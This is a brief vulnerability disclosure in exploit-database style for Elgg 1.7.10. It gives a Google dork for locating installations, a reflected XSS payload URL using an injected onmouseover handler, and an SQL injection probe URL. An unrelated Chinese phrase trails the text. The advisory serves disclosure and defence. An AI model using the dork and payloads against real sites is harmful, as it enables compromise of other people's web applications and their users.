# Exploit Title: Elgg 1.7.10 <= Multiple Vulnerabilities # Google Dork: intext:"Powered by Elgg, the leading open source social networking platform" # Date: 2011-08-18 # Author: Aung Khant <YGN Ethical Hacker Group - http://yehg.net/> # Software Link: http://elgg.org/getelgg.php?forward=elgg-1.7.10.zip # Version: 1.7.10 <= 1.XSS http://localhost/pg/embed/media?internalname=%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22 2. SQL Injection http://localhost/pg/search/?q=SQLin&search_type=tags&tag_names=location'
体验盒子